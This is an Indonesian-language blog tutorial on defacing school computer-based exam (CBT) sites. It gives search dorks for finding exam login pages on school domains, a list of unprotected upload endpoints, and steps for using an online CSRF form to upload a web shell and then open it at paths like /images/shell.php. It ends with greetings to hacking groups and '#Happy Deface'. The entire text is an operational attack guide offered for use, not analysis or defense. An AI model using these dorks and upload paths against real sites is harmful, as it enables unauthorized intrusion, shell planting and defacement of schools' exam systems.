Tutorial Deface Poc CBT with Csrf Up Shell
Mei 10, 2021
Tutorial Deface Poc CBT with Csrf Up Shell
Oleh Xskyz07
Assalamualaikum hallo gaes balik lagi sama gua kali ini gua bakal kasih tutorial Deface Poc CBT with csrf upload shell
Bahan:
-Hp/Pc
-Dork
-Exploit
-Shell & Sc Deface
Dork:
inurl:/login.php intitle:ujian online
inurl:/cbt/login.php site:sch.id
inurl:/login.php intitle:cbt beesmart
inurl:/login.php inurl:/cbt
inurl:/login.php intitle:ujian sekolah
inurl:/login.php intitle:ujian sma
inurl:/login.php intitle:cbt pintersmart
inurl:/login.php intitle:ujian pintersmart
KEMBANGIN LAGI!!
Exploit:
/panel/pages/upload-file.php
/panel/pages/upload_video.php
/panel/pages/upload_audio.php
/panel/pages/upload_gambar.php
/panel/pages/upload-file.php
/panel/pages/upload-fotosiswa.php
/panel/pages/upload-banner.php
/panel/pages/upload-logo.php
Pertama kalian ngedork menggunakan dork di atas lalu cari target nya
Kalo udah nemu target nya langsung aja kasih exploit nya di belakang site/path
www.site.com/exploit
www.site.com/path/exploit
Nah kalo blank seperti itu tanda nya vuln ya....
Langsung salin aja webnya yg udh di kasih exploit lalu ke csrf online
Nah lalu tempel di url target untuk post file nya ketik uploadfile
Kalo udh langsung aja klik lock target/kunci target lalu upload shell kalian
Nah kalo gini tanda nya berhasil ke upload tinggal panggil aja
Caranya?
www.site.com/images/shell.php
www.site.com/pictures/shell php
www.site.com/video/shell.php
Jika ada path maka tambahin di belakang path
Done Berhasil!!!
Oke segitu aja tutor dari gua semoga bermanfaat sekian dan terima kasih
Thanks To:
-All Member Indonesia Cyber Nightmare
-Black Brotherhood
-SevenGhost666
-Eagle Xploiter
-Doraemon Cyber Team
#Happy Learn
#Happy Deface